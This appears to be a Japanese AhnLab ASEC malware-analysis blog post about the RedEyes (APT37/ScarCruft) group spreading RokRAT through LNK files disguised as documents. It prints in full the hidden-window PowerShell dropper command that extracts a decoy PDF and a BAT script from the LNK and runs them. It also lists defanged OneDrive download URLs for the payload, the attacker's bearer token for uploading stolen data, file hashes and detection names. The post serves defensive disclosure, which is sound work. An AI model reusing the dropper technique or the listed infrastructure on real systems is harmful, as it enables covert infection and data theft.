リンクファイル(*.lnk)によって拡散する RokRAT マルウェア:RedEyes(ScarCruft)

AhnLab Security Emergency response Center(ASEC)は、先月韓国国内の金融企業セキュリティメールを詐称した CHM マルウェアを配布した RedEyes 攻撃グループ(also known as APT37、ScarCruft)が、最近 LNK ファイルを通して RokRAT マルウェアを配布していることを確認した。

RokRAT マルウェアはユーザー情報を収集して追加でマルウェアをダウンロードできるマルウェアで、過去にはアレアハングルドキュメントおよび Word ドキュメントを通じて配布された経歴が存在する。今回確認された LNK ファイルは内部に PowerShell コマンドを含んでおり、temp パスに正常なファイルとともにスクリプトファイルを生成および実行し、不正な振る舞いを実行する。確認された LNK ファイル名は以下の通りである。

  • 230407情報誌.lnk
  • 2023年度4月29日セミナー.lnk
  • 2023年度個人評価実施.hwp.lnk
  • 北朝鮮外交官選抜派遣および在外公館.lnk
  • 北朝鮮外交政策決定プロセス.lnk

「230407情報誌.lnk」ファイルは PDF アイコンに偽装しており、不正な PowerShell コマンドを含んでいる。

図1. LNK ファイルのプロパティ

LNK ファイル内部には PowerShell コマンドだけでなく、正常な PDF ファイルデータと不正なスクリプトコードが存在する。また、0x89D9A の位置からファイルの末尾まで 0x141702A サイズほどのダミーバイトが存在する。

図2. LNK ファイルの末尾に存在するダミーデータ

LNK ファイル実行時、cmd.exe によって実行される Powershell コマンドは以下の通りである。

/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -Match ‘Program Files’) {            $dirPath = ‘%temp%’            }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = ‘%temp%\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = ‘%temp%\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^& $exePath;

LNK ファイルを 0x890F4 バイトだけ読み込み、最初の 0x9AA バイトを除外して TEMP フォルダーに「230407情報誌.pdf」というファイル名で保存および実行する。その後、また LNK ファイルを 0x89D9A だけ読み込み、PDF データが存在する 0x890F4 バイトを除外した残りを TEMP フォルダーに「230412.bat」というファイル名で保存および実行する。

図3. LNK ファイルの 0x9AA 位置に存在する PDF データ

図4. LNK ファイルの 0x890F4 位置に存在するスクリプトコード

図5. TEMP のパスに生成されたファイル

攻撃者は正常な PDF ファイルを実行してユーザーが正常な PDF ファイルを実行しているかのように見せかけ、スクリプトファイルを通して不正な振る舞いを実行する。

図6. 230407情報誌.pfd(正常なファイル)

共に実行されたスクリプトファイルには、以下のように HEX 値で、不正なコマンドを実行する PowerShell コマンドが存在する。

図7. 230412.bat

最終的に実行される PowerShell コマンドは以下のように hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content でエンコードされたデータをダウンロードし、これをデコードして Powershell プロセスにインジェクションして不正な振る舞いを実行する。

図8. 最終的に実行される PowerShell コマンド

図9. Onedrive にアップロードされた不正なファイル

インジェクションされたデータは RokRAT マルウェアで、ユーザー情報の収集および追加の不正なファイルをダウンロードすることができる。収集された情報は pcloud, yandex などのクラウドサービスを使用して攻撃者のクラウドサーバーに送信され、リクエストヘッダーの UseAgent は Googlebot に偽装していた。ファイル転送に使用される認証トークン情報は以下の通りである。

  • Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX

追加で確認された不正な LNK ファイルを通して実行される正常なドキュメントファイルは以下の通りである。

図10. 2023年度4月29日セミナー.lnk によって生成された2023年度4月29日セミナー.pdf

図11. 北朝鮮外交政策決定プロセス.lnk によって生成された230402.hwp

RokRAT マルウェアは以前から拡散し続けており、Word ドキュメントだけではなく、様々な形式のファイルで拡散しているため、ユーザーは特に注意する必要がある。

[ファイル検知]
Dropper/LNK.Agent (2023.04.08.00)
Downloader/BAT.Agent (2023.04.08.00)

[IOC]
0f5eeb23d701a2b342fc15aa90d97ae0 (LNK)
aa8ba9a029fa98b868be66b7d46e927b (LNK)
657fd7317ccde5a0e0c182a626951a9f (LNK)
be32725e676d49eaa11ff51c61f18907 (LNK)
8fef5eb77e0a9ef2f97591d4d150a363 (bat)
461ce7d6c6062d1ae33895d1f44d98fb (bat)
hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 3 votes
評価する
Subscribe
Notify of
guest

1 コメント
Inline Feedbacks
View all comments
trackback

[…] リンクファイル(*.lnk)によって拡散する RokRAT マルウェア:RedEyes(ScarCruft) […]